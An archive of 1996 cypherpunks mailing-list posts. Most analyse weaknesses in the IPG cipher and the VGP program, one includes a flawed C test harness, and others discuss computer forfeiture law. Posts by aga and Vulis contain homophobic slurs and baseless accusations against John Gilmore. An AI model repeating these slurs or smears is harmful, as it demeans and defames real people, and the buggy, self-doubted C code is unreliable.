> 	Especially when all the algorithms listed have known problems
> 	of one kind, or another.   << And yes, I know that the known
> 	problems -- in some instances --- are entirely theoretical in
> 	nature.  >>
	In your quote, you deleted the smiley about VGP. It's a joke. Your claim
that VGP is weaker than PGP is unfounded, as VGP uses IDEA, which is the
symmetric algorithm used in PGP. ASCII and Vigenere are very weak, but they
are fast and geared toward people who simply want to stop their brother or
sister from getting into something. As for the security of other
algorithms, BlowFish is used in PGPfone and RC4 is used in SSL -- since you
control the key size in VGP, you can make RC4 virtually unbreakable (not to
mention the problem of the attacker figuring out the key size in the first
place).

Mark Rosen
FireSoft - http://www.geocities.com/SiliconValley/Pines/2690
Mark Eats AOL - http://www.geocities.com/TimesSquare/6660




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 30 Nov 1996 10:03:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Ignoramus Chewed-Off on IPG algorithm
Message-ID: <199611301759.LAA13760@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hi,

I was sort of tired of endless talk that "IPG algorithm was not 
peer-reviewed, blah blah blah, so we won't even look at it, 
blah blah blah", and decided to look at what Don Wood writes and
try to see how his program actually works. 

Of course, I am not an expert in cryptography, and will appreciate all
corrections. The web page to look at is http://www.netprivacy.com/algo.html,
and it describes IPG algorithm in some detail.

First of all, the description of the algorithm is extremely unclear. I
understand that this may be Don Wood's writing style, but it is certainly 
not the most efficient style for precise communications. I suggest that
Don tries to rewrite his description to be more structured.

Second, I seriously suspect that his algorithm of "trimming" is NOT
going to work right. Just to remind everyone, he generates pseudo-random
A(JV), B(JV), C(JV) such that

	16384 <  C < 20361
	         B < 12227
	A arbitrary (at least the web page contains no restrictions 
	  on the value of A).

and then goes on to "trimming" -- a process that obtains a new value
of A that is LESS than 16384 through this algorithm: 

       DO
         JV=JV+1
         IF JV=53 THEN JV=0
         A(JV)=(A(JV)+B(JV)) MOD C(JV)
       UNTIL A(JV)<16384

We shall first note that THERE ARE CASES WHEN THIS ALGORITHM WILL NEVER
STOP! For example, if all A values are _initially_ 16385 and all C
values are 16386 and all B's are 0, it is obvious that the pseudocode 
above will be stuck in endless loop.

No good for IPG algorithm.

in fact, if only some triplets of A, B, and C have B == 0 and 16384 < A < C,
these triplets will always be ignored (skipped) by his trimming process.

Second, IPG's claim that ``Of even greater importance is the second role
of producing a distribution of the numbers 0 to 16383, so that the
number of each of those numbers produce, asymptotically approach an
even distribution, in the same way that theoretically a true random
number generator produces a set of numbers whose frequency
asymptotically approach an even distribution'' is FALSE:

I do not see why the distribution of A's should necessarily contain all
numbers from 0 to 16383, less to "approach" an even distribution. For
example, if all initial A, B, and Cs are even numbers, we'll obviously
never get an odd number for A(JV), no matter how many iterations.

If, say, 40 out of 53 of triplets A, B, and C contain only even numbers
(not a statistical impossibility!), then about 75% of resulting values of
A(JV) will be even.

No good for the keystream. There are many more imperfections than just
related to all-even triplets.

- - - -

Let's go on, to the description of the "scrambling tables" and 
actual encryption.

He uses three tables, DIFF, DISP, DETR, each containing 4096 elements.
DISP is randomly generated (or so I understand his term "prescrambled"),
DIFF is a random transposition of DISP (same values as in DISP, but in
another order), and DETR, again, is filled with some random data.

It does not really matter to my analysis how DISP and DETR are generated.

Here's how he encrypts the data (in a loop for I from 0 to 4095):

                       D1=(D1+A(JV)) AND 4095
                       D2=DISP((D2+D1) AND 4095)
                       F=DETR(D2)<<8
                       D3=(D3+D2) AND 4095
                       BUF(DIFF(I))=BUF(DIFF(I)) XOR (F+(DETR(DISP(D3))))

I.e., D1, D2, and D3 are regenerated each pass of the loop and then are
used to encrypt item DIFF[I] (i.e., 2-byte word with index DIFF[i], NOT
I). 

That is very bad: what it means is that we are not guaranteed that all
BUF[i] will be scrambled! It is fairly clear that about 1/(e*e) (e is
the base of natural logs) will be left unscrambled!!!

This follows from the fact that even with perfectly random numbers used
as DIFF[i], the probability that a cell J will be scrambled is 2/4096
(it is 2 and not 1 since each hit covers two bytes and not one).
Therefore, the probability  that cell J will be left unscrambled is

                (1-2/4096) ** 4096

which is approximately equal exp(-2) == 1/(e*e).

It means that 1 out of seven characters will be left unencrypted at all.

No good for a stream cipher. I think that his cipher could have been
made stronger if he actually did not use DIFF[i] as an index and used
I instead.

Still, of course, his algorithm has nothing to do with one time pads.
Since this is clearly not a matter of high theories but a simple question 
of accepted definitions, there is little point to argue about it and I
preferred to address details of his algorithm instead.

There may be more problems with IPG algorithm that I simply missed.

I would appreciate your corrections and notes.

Thank you.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 30 Nov 1996 09:30:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Seditious Cable!
In-Reply-To: <199611291923.UAA25308@basement.replay.com>
Message-ID: <XFu8XD50w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@replay.com (Anonymous) writes:

>  dlv@bwalk.dm.com wrote to All:
>
>  d> Doug Barnes <cman@c2.net> writes:
>  >> (Taiwan story warning...) This reminds me of the pirate cable
>  >> TV wars, which hit their peak during my stay there --
>
> [...]
>
>  d> Now, what would the U.S. government (state or los federales) do in a
>  d> similar situation? They'd probably fine any resident found with a
>  d> cable TV thousands of dollars and if that didn't work, they'd start
>  d> jailing people. Maybe even burn a few TV viewers, a la Waco. :-)
>
> And these are the folks you want to maintain your key escrow?

This is another example of lies being spread by John Gilmore and his cronies.
I don't want the U.S. Government to maintain my or anyone else's key escrow.

                        JOHN GILMORE IS A LIAR.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 30 Nov 1996 10:25:50 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Ignoramus Chewed-Off on IPG algorithm
In-Reply-To: <no.id>
Message-ID: <199611301803.MAA13859@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Igor Chudov @ home wrote:
> 
> Hi,
> 
> I was sort of tired of endless talk that "IPG algorithm was not 
> peer-reviewed, blah blah blah, so we won't even look at it, 
> blah blah blah", and decided to look at what Don Wood writes and
> try to see how his program actually works. 
> 
> Of course, I am not an expert in cryptography, and will appreciate all
> corrections. The web page to look at is http://www.netprivacy.com/algo.html,
> and it describes IPG algorithm in some detail.
> 
> First of all, the description of the algorithm is extremely unclear. I
> understand that this may be Don Wood's writing style, but it is certainly 
> not the most efficient style for precise communications. I suggest that
> Don tries to rewrite his description to be more structured.
> 
> Second, I seriously suspect that his algorithm of "trimming" is NOT
> going to work right. Just to remind everyone, he generates pseudo-random
> A(JV), B(JV), C(JV) such that
> 
> 	16384 <  C < 20361
> 	         B < 12227
> 	A arbitrary (at least the web page contains no restrictions 
> 	  on the value of A).
> 
> and then goes on to "trimming" -- a process that obtains a new value
> of A that is LESS than 16384 through this algorithm: 
> 
>        DO
>          JV=JV+1
>          IF JV=53 THEN JV=0
>          A(JV)=(A(JV)+B(JV)) MOD C(JV)
>        UNTIL A(JV)<16384
> 
> We shall first note that THERE ARE CASES WHEN THIS ALGORITHM WILL NEVER
> STOP! For example, if all A values are _initially_ 16385 and all C
> values are 16386 and all B's are 0, it is obvious that the pseudocode 
> above will be stuck in endless loop.
> 
> No good for IPG algorithm.
> 
> in fact, if only some triplets of A, B, and C have B == 0 and 16384 < A < C,
> these triplets will always be ignored (skipped) by his trimming process.

Note also that if B(K) == 1, his algorithm will need to make C passes
through the loop for JV == k, in order to generate a new value of A(JV).

This is very inefficient and results in a bias for triplets with high
Bs -- because they will generate good A(JV) more frequently.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 30 Nov 1996 10:26:03 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG Algorith Broken!u
In-Reply-To: <Pine.BSI.3.95.961130040004.19278O-100000@citrine.cyberstation.net>
Message-ID: <199611301820.MAA13953@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


wichita@cyberstation.net wrote:
> On , 25 Nov 1996 paul@fatbrain.demon.co.uk wrote:
> > > > Ahh... an OTP isn't unbreakable.  Its just so encredibly breakable that
> > > > you never know which break was the correct one ;)
> > > 
> > > Note that Schneier says "perfect", not "unbreakable".
> > 
> 
> More gobbledegook about nothing. Yes it is perfect and yes it is
> unbreakable!

Don, please look at my message that analyzes your algorithm in some
detail. I think that your algorithm is far from perfect because, among
other things, your system would leave about 1 out of 7 characters
unencrypted, and also because your A(JV) are not as good as you claim 
them to be.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 30 Nov 1996 10:36:55 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961130021602.19278D-100000@citrine.cyberstation.net>
Message-ID: <199611301830.MAA14034@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


wichita@cyberstation.net wrote:
> > There *IS NO SUCH PROOF*.  Just like you can't prove that god created the
> > universe, or that Oswald shot Kennedy, and so on and so forth.  It can't
> > be proven.  It never has been proven, and it never will be proven.  People
> > have new ideas, new algorithms are invented.  Someday, somebody will crack
> > _all_ the cryptosystems that have now been invented.
> > 
> 
> To repeat Frantz', I thought Shannon proved OTPs were unbreakable. I can
> also assure you that they are unbreakable, because you cannot solve a
> three variable equation where only one variable is known, ie. the
> ciphertext. That is a fact, not an opinion like God, or Oswald, there are
> facts and opinions. It is a fact that OTPs are unbreakable and it is a
> fact that our system is unbreakable. Q.E.D. for the very same reasons
> except that we must use exclusionary proof instead of inclusionary proof
> like Shannon. 

Don, can you give us this proof please? I mean really complete proof, 
not vague references to other people's theorems and metadiscussions. 

I do agree with you that your opponents freuquently attack you without
actually proving what they say. This is unfortunate. I do hope that you, 
though, can be above your detractors able to produce real proofs without
resorting to namecalling and character assassination.

I.e., your bashing of Paul Bradley, for example, may or may not
concvince me that Paul does not understand cryptography. It will NOT
convince me, though, that IPG system is good. I am not interested in
your attacks on persons, however right you may be. Rather, it is
important that you give us a good proof of security of IPG system.

Thanks

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Nov 1996 10:12:04 -0800 (PST)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: denial of service and government rights
In-Reply-To: <3.0.32.19961129195752.00730f7c@mail.io.com>
Message-ID: <Pine.SUN.3.94.961130124851.5120K-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Nov 1996, Greg Broiles wrote:

> 1.	Seizure & retention as evidence or instrumentality of a crime - e.g., if
> someone breaks into my house, steals my gun, and uses it to shoot someone,
> it'll be a long damn time before I get my gun back.

[...]

> of luck. Bummer. I don't see any reason why this wouldn't be true for a
> computer. Fed.Rul.Crim.Pro. 41(b)(1) allows the seizure (but seizure is not
> forfeiture) of "property that constitutes evidence of the commission of a
> criminal offense". 

It is true of computers.
Take the case of Ripco (the Chicago BBS raided in the SunDevil raids back
when).

I don't think "Dr. Ripco" has yet gotten his equipment back.  I don't know
for sure, but what I do know is that 5 years after the raid, he still had
certainly not gotten anything back.  Keep in mind that the feds took
everything which even looked computer-like in his rather substantial
workshop, including telephones, VCR equipment, burners, the works.

Recall also that Ripco was never specifically charged (or the minor
charges that they did try to pin didn't stick).

Also recall that Ripco (now ripco.com) was raided with a -sealed- warrant.
I dont think that the contents of that warrant have, even today, been
released (though I could be mistaken).  Certainly 5 years after they had
not.

> 2. 	Forfeiture of the instrumentality of a crime, or of a nuisance - cf.
> _Bennis v. Michigan_ <http://www.law.cornell.edu/supct/cases/94-8729.html>,
> the recent Supreme Court case where the "Justices" (cough cough) upheld the
> forfeiture of a wife's half interest in a car which was used (without her
> knowledge/consent) by her husband to facilitate the crime of prostitution.

See my past article on this case.

> The Supreme Court rejected the idea that the Fifth Amendment's takings
> clause or the Fourteenth Amendment's due process clause prevents the
> forfeiture of the instrumentality of a crime without a showing of
> culpability on the part of the owners. Some forfeiture statues (e.g., 21
> USC 881, 1989 Oregon Laws Chapter 791, both re drug-related forfeitures)
> provide for an "innocent owner" defense to forfeiture, but the Supreme
> Court doesn't seem to think that's required as a matter of constitutional
> law.  Fed.Rul.Crim.Pro 41(b)(3) allows the seizure of "property designed or
> intended for use or which is or has been used as the means of committing a
> criminal offense".

Nice summary.

>  There's an excellent resource available re computer search & seizure at
> <http://www.epic.org/security/computer_search_guidelines.txt> - it's the US
> DOJ's "Guidelines for Searching & Seizing Computers", pried loose by an
> EPIC FOIA request and scanned.
> 
> But there's a big difference between "seizure" and "forfeiture".

I'd argue with computer hardware it is a distinction without a difference.
Seizing computer hardware (like Ripco's stuff) for in excess of 5 years is
tantamount to forfeiture given depreciation and so forth.

Add to this the very liberal rules about how long the feds can take to
even CHARGE you with a crime after seizure....

> It's
> possible that recent legislation has done for computer crime what the drug
> forfeiture laws have done with respect to title in property - 21 USC 881(h)
> indicates that "All right, title, and interest in property described in
> subsection (a) of this section [e.g., property used in connection with a
> drug crime] shall vest in the United States upon commission of the act
> giving rise to forfeiture under this section." Given the innocent owner
> defenses available in an 881 forfeiture, (h) sounds scarier than it works
> out to be.

RICO has the same problems, and also in the context of innocent 3rd
parties.  Innocent owner protection is mostly in the form of definition.
Specifically what is an "instrumentality of the crime" and what is a
"passive object" which just happened to be involved.  The real weakness is
that this is generally a question of law and tends to end up in the hands
of judges, not juries, to decide.  It has factual elements, to be sure,
but not enough in the current construct to make me feel secure that a jury
is really the only gateway to finding something an "instrumentality."

> So yes, there may be a statute which gives title to the government in
> computers used to commit crimes, and no, the Supreme Court won't
> necessarily care about an "innocent owner".

Again, I would argue that such a statute needn't even exist given the
rules already well estlablished and demonstrated in action with regard to
indefinate seizure of computer hardware even in the absence of criminal
claims against the owner.

Also, take note that many states are adopting unique civil forfeiture
approaches.  Research into the federal system, while generally giving one
the flavor, cannot give you the full picture.  (Michigan and Indiana are
mavericks here).

> >on the site, he or she unwittingly downloads the virus.  A computer 
> >crime consultant with SAIC warns that these attacks can be launched 
> >on an innocent party's Web server, but once that happens, the server 
> >can become the subject of a wiretap and a search warrant.  "The title 
> >of your computer vests with the government as soon as a hacker uses 
> >it to commit a crime," he says.  

Strictly speaking, he may be correct, however, I doubt very much that a
judge would ignore a motion for a temporary restraining order pleading
that the server in question is the primary income stream for the (ISP,
marketing company, bank, etc.).

Also note carefully the distinction between "instrumentality of the crime"
and "passive participating element" in the crime.  Now if the hacker was
co-owner of the server....

Again, I think the question of forfeiture somewhat meaningless in that
the server could be taken as evidence and not be returned until it's value
is <1/50th of the purchase price regardless of the complicity of the
owner.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 30 Nov 1996 10:13:39 -0800 (PST)
To: jonathon <grafolog@netcom.com>
Subject: Re: Announcement: Very Good Privacy
In-Reply-To: <Pine.SUN.3.95.961130080157.18557I-100000@netcom17>
Message-ID: <Pine.LNX.3.95.961130131239.357A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 30 Nov 1996, jonathon wrote:

> On Fri, 29 Nov 1996, Mark Rosen wrote:
> 
> > 	I have written an encryption program called Very Good Privacy 
> 
> 	Trademark violation here.   Probably not a good thing.

Nope.  "Pretty Good" is trademarked, but "Very Good" isn't.

> 	I'm not sure how an encryption product that uses encryption
> 	algorithms weaker than Pretty Good Privacy can be described
> 	as being better than PGP.  

Both programs use IDEA.  How is this weaker?

> 
> 	Especially when all the algorithms listed have known problems
> 	of one kind, or another.   << And yes, I know that the known
> 	problems -- in some instances --- are entirely theoretical in
> 	nature.  >>

RC4 has stood up to cryptanalysis.  It's secure as long as the same key isn't
used twice.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMqB58CzIPc7jvyFpAQGEgwf/VZ8gf+W84DV0cSCSnUNgKEqF/G2fKX4C
bJAkY1FSz3edH4Y+KyWkVIVkpLRmBTSNTV45secSeyVGdvnjAX4zcnUld6hOIGSc
bqE6hge9CQpWxsojckulwNTPphL4ZRLLA4UJViObOYZs8jJi6b4aZ8FPHfQwCdBh
H64rGSGsEFj3WuDoH4nVgnNzwxXxLLllTAOOic8HFqRn2BeqxGRlkvGTraxE+on/
pKQ55CUQNBUu7L05lGp4njc1qZRpe9EeCLChRCEP6FVmy9iBtIRFH+lzRquDR+A4
lARm8zR1QKwDcCSzz8OPN52Lp/rICmcHWR7Lfhw/Vy8D6NxqG1lmuA==
=CPKh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 30 Nov 1996 13:20:07 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: IPG algorithim
In-Reply-To: <199611301953.NAA14436@manifold.algebra.com>
Message-ID: <199611302118.NAA12825@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain




I have translated the IPG algorithim's "engine" to C, to generate
some random values from it for testing purposes.  It does not
look very random in either the xnoisesph program or the DIEHARD
test battery.   However I may well have misinterprested Mr. Wood's
description (his writing is, as Mr. Chudov points out, difficult to
understand) or written my code incorrectly.  Here it is, play
with it yourself.  To my untrained eye the lack of randomness
in what's essentially a stream cipher would be disturbing.
However I am not a cryptoanalysist so I do not know to
what extent this weakens the cipher.


The IPG description does not say (but implies to me) that
the various tables that are to be filled in by "random" values must
be filled in by PRNGs that are seeded with the same seeds by
each of the party that knows the key.  Otherwise the "encryptor
streams" that are generated will be unrelated and decryption will not
be possible.  To make my test work I have used the simple rand()
function to fill in the tables.


Corrections are welcome.



#include <stdio.h>

/* a C translation of the IPG "EUREKA" algorithim's "engine".
** This is supposed to produce random numbers for the IPG
** "encryptor stream".
** See http://www.netprivacy.com/ for the original description.
** Eric Murray  ericm@lne.com  This code placed under GNU copyleft.  */

/* machine-dependent stuff, change to suit different platforms: */
typedef unsigned char byte;
typedef unsigned short uint16;


/* tables: */
uint16 A[53];
uint16 B[53];
uint16 C[53];


int init_table(uint16*table, uint16 min, uint16 max)
{
	/* IPG specifies no algorithim for producing the "random"
	** initial values in the ABC tables, but it's obvious that
	** it requires a PRNG that's somehow seeded from the "key".
	** I've just used rand() here.  In UNIX rand() called with no
	** seed is supposed to seed itself with 0. */
	int i;
	int count, r;

	for(i = 0; i < 53; i++) {
		table[i] = min + (rand() % (max - min));
	}
}

main(int argc, char **argv)
{
	uint16 jv;
	int argcnt, i, n, count, diehard, nelem;

	diehard = 0;
	argcnt = 1;
	if (argc >= 2) {
		if (strncmp(argv[argcnt],"-d") == 0) {
			diehard++;
			argcnt++;
		}
	}
	if (argc > argcnt - 1 ) {
		n = atoi(argv[argcnt]);
		fprintf(stderr,"Generating %d values\n",n);
	}
	else {
		n = 2000;
	}

	/* seed tables: */
	fprintf(stderr,"Seeding:  A");  fflush(stderr);
	init_table(A,0,65535);
	fprintf(stderr," B");  fflush(stderr);
	init_table(B,0,12227);
	fprintf(stderr," C");  fflush(stderr);
	init_table(C,16384,20361);
	fprintf(stderr,"\n");  fflush(stderr);

	/* generate n values: */
	for(; n > 0; n--) {
		/* jv is "random" (where's it seeded from?) */
		jv = (uint16)(rand() % 53);

		/* count limits the number of traverses to 53^2 so we don't get stuck */
		for(count = 0; count < 2809; count++) {
			jv++;
			if (jv == 53) jv = 0;
			A[jv] = (A[jv] + B[jv]) % C[jv];
			if (A[jv] < 16384) break;
		}
		if (count == 2809) fprintf(stderr,"Oops.\n");
		else {
			if (!diehard) {
				printf("%d\n",A[jv]);
			}
			else {
				/* print output in DIEHARD required format:
				** actually since we have 16-bit ints and DIEHARD
				** wants 32-bit ints, we print 20 per line instead of 10 */
				if (nelem++ > 19) {printf("\n"); nelem = 0;}
				printf("%4.4x",(unsigned int)A[jv]);
			}
		}
	}
}



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marc <marc@mtjeff.com>
Date: Sat, 30 Nov 1996 13:46:47 -0800 (PST)
To: whgiii@amaranth.com (William H. Geiger III)
Subject: Re: Strong-crypto smart cards in Singapore and Germany
In-Reply-To: <199611301740.LAA29497@mailhub.amaranth.com>
Message-ID: <199611302146.NAA07673@beowulf.got.net>
MIME-Version: 1.0
Content-Type: text/plain


> P.S. For those of you dreaming of anonymous e-cash & the crypto anarchy of
> the future; do you really think the government & banking industries are
> going to give up controll of the curency regardless of what for it takes? 

But its not a matter of "giving it up", its more "not being given it."
There is little control with cash now, only some if the serial numbers are
prerecorded and watched for, and even then not to a paint where they can
come stomp on you before you walk out of the mall. But I agree, it is
unlikely that banks would pass up the opportunity, all in the name of
"loss reduction" and "profit through sharing of demographics"



Marc
marc@mtjeff.com  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 30 Nov 1996 11:58:22 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Ignoramus Chewed-Off on IPG algorithm
In-Reply-To: <no.id>
Message-ID: <199611301953.NAA14436@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Igor Chudov @ home wrote:
> 
> Let's go on, to the description of the "scrambling tables" and 
> actual encryption.
> 
> He uses three tables, DIFF, DISP, DETR, each containing 4096 elements.
> DISP is randomly generated (or so I understand his term "prescrambled"),
> DIFF is a random transposition of DISP (same values as in DISP, but in
> another order), and DETR, again, is filled with some random data.
> 

Correction: by "scrambling" Don means transposing elements of the 
table containing 4096 numbers 1-4096.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 30 Nov 1996 12:30:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Building a DC-NET
In-Reply-To: <Pine.SUN.3.94.961130123354.5120J-100000@polaris>
Message-ID: <V928XD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:

> On Sat, 30 Nov 1996, Simon Spero wrote:
>
> > (what's the Alice/Bob name for someone  trying a denial of service attack?)
>
> Louis?

John the petty small-time bitch?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: varange@crl.com (Troy Varange)
Date: Sat, 30 Nov 1996 15:09:30 -0800 (PST)
To: varange@crl.com
Subject: Copyright violations
In-Reply-To: <alzheimer@juno.com>
Message-ID: <Love@22694>
MIME-Version: 1.0
Content-Type: text/plain


	But software wants to be free!

-- 
Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Sat, 30 Nov 1996 12:03:39 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: The Rise and Fall of Cypherpunks  WAS [Re: the Dennings]
In-Reply-To: <NLR8XD40w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.95.961130145407.24591C-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Nov 1996, Dr.Dimitri Vulis KOTM wrote:

> attila@primenet.com writes:
> >         we, and I mean all of us, who contribute the bulk of the
> >     "opinions" to cypherpunks gave the mainstream press the biggest
> >     possible hole to run straight over us, declaring us anarchists
> >     and wild-eyed fanatics. unless we as a group mend our ways, and
> >     turn out intelligent reasoning for the advance of cryptography as
> >     a mainstream way of life, we will be forever consigned not only to
> >     the dustbin, but subject to the ridicule of both the press and the
> >     government.
> 
> Ridicule is what John Gilmore and EFF deserve, and more.
> 
> >         None of us are above a little sarcasm --but let's get the
> >     vituperative effluent out of the system.  do whatever you wish in
> >     private mail, but keep the profane rantings off the list.
> >
> >             this goes for you, Dimitri; and "aga" too.
> 

Well, if it does not apply to Boursy, then you are still going
to get a royal ass-kicking. The EFF and Gilmore are too connected
to UUNET and the cabal to have any credibility on this usenet any
m.

And DIG: I never even subscribed to the stupid fucking list!
All I ever did was respond to the cypherpunks out of a courtesy to
never cut headers.  I could give a shit less about whatever you
"punks" do.  I ain't no "punk" and I don't like the word when
there is an admitted faggot at the helm.

And the guy being a faggot is the whole reason why the EFF
or the cypherpunks have no credibility.  A sick fucking culture it
is now defined as, by most onlookers.

> I suspect John Gilmore is opposed to the spread of cryptography and privacy
> technology. He _opposed my efforts to template NPOs for running the anonymous
> remailers, because he believes in "identity escrow" - the ability of the
> remailer operators to track down and silence whoever "abuses" their network to
> say things "homophobic" and otherwise politically incorrect. John Gilmore and
> his pack of 'punks would rather see no crypto deployed than widely available
> weak crypto with hooks that permit easy replacement by stronger crypto.
> Is John Gilmore an NSA plant, an "agent provocateur"?
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

Admitted homosexuals have no place in the modern usenet.
Now keep your replies to the cypherpunks list; I don't
want to hear any more punk shit!

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 30 Nov 1996 12:40:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: "CypherPunks" and The Pink Swastika
Message-ID: <4q48XD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Slothrop" <slothrop@poisson.com> writes:
<anti-semitic spam>

Read the _Pink Swastika_ to learn more about the role the likes of
Jason Durbin and John Gilmore played in Hitler's rise to power.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 30 Nov 1996 13:30:14 -0800 (PST)
To: ericm@lne.com (Eric Murray)
Subject: Re: IPG algorithim
In-Reply-To: <199611302118.NAA12825@slack.lne.com>
Message-ID: <199611302127.PAA14989@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Eric Murray wrote:
> 
> 
> 
> I have translated the IPG algorithim's "engine" to C, to generate
> some random values from it for testing purposes.  It does not
> look very random in either the xnoisesph program or the DIEHARD
> test battery.   However I may well have misinterprested Mr. Wood's
> description (his writing is, as Mr. Chudov points out, difficult to
> understand) or written my code incorrectly.  Here it is, play
> with it yourself.  To my untrained eye the lack of randomness
> in what's essentially a stream cipher would be disturbing.
> However I am not a cryptoanalysist so I do not know to
> what extent this weakens the cipher.

Thanks for an interestnig approach to testing (see below).

> The IPG description does not say (but implies to me) that
> the various tables that are to be filled in by "random" values must
> be filled in by PRNGs that are seeded with the same seeds by
> each of the party that knows the key.  Otherwise the "encryptor
> streams" that are generated will be unrelated and decryption will not
> be possible.  To make my test work I have used the simple rand()
> function to fill in the tables.

A good point.

> Corrections are welcome.

see below.
 
> 
> #include <stdio.h>
> 
> /* a C translation of the IPG "EUREKA" algorithim's "engine".
> ** This is supposed to produce random numbers for the IPG
> ** "encryptor stream".
> ** See http://www.netprivacy.com/ for the original description.
> ** Eric Murray  ericm@lne.com  This code placed under GNU copyleft.  */
> 
> /* machine-dependent stuff, change to suit different platforms: */
> typedef unsigned char byte;
> typedef unsigned short uint16;
> 
> 
> /* tables: */
> uint16 A[53];
> uint16 B[53];
> uint16 C[53];
> 
> 
> int init_table(uint16*table, uint16 min, uint16 max)
> {
> 	/* IPG specifies no algorithim for producing the "random"
> 	** initial values in the ABC tables, but it's obvious that
> 	** it requires a PRNG that's somehow seeded from the "key".
> 	** I've just used rand() here.  In UNIX rand() called with no
> 	** seed is supposed to seed itself with 0. */
> 	int i;
> 	int count, r;
> 
> 	for(i = 0; i < 53; i++) {
> 		table[i] = min + (rand() % (max - min));
> 	}
> }
> 
> main(int argc, char **argv)
> {
> 	uint16 jv;
> 	int argcnt, i, n, count, diehard, nelem;
> 
> 	diehard = 0;
> 	argcnt = 1;

how about doing randomize()?

> 	if (argc >= 2) {
> 		if (strncmp(argv[argcnt],"-d") == 0) {
> 			diehard++;
> 			argcnt++;
> 		}
> 	}
> 	if (argc > argcnt - 1 ) {
> 		n = atoi(argv[argcnt]);
> 		fprintf(stderr,"Generating %d values\n",n);
> 	}
> 	else {
> 		n = 2000;
> 	}
> 
> 	/* seed tables: */
> 	fprintf(stderr,"Seeding:  A");  fflush(stderr);
> 	init_table(A,0,65535);
> 	fprintf(stderr," B");  fflush(stderr);
> 	init_table(B,0,12227);
> 	fprintf(stderr," C");  fflush(stderr);
> 	init_table(C,16384,20361);
> 	fprintf(stderr,"\n");  fflush(stderr);
> 
> 	/* generate n values: */
> 	for(; n > 0; n--) {
> 		/* jv is "random" (where's it seeded from?) */
> 		jv = (uint16)(rand() % 53);
> 
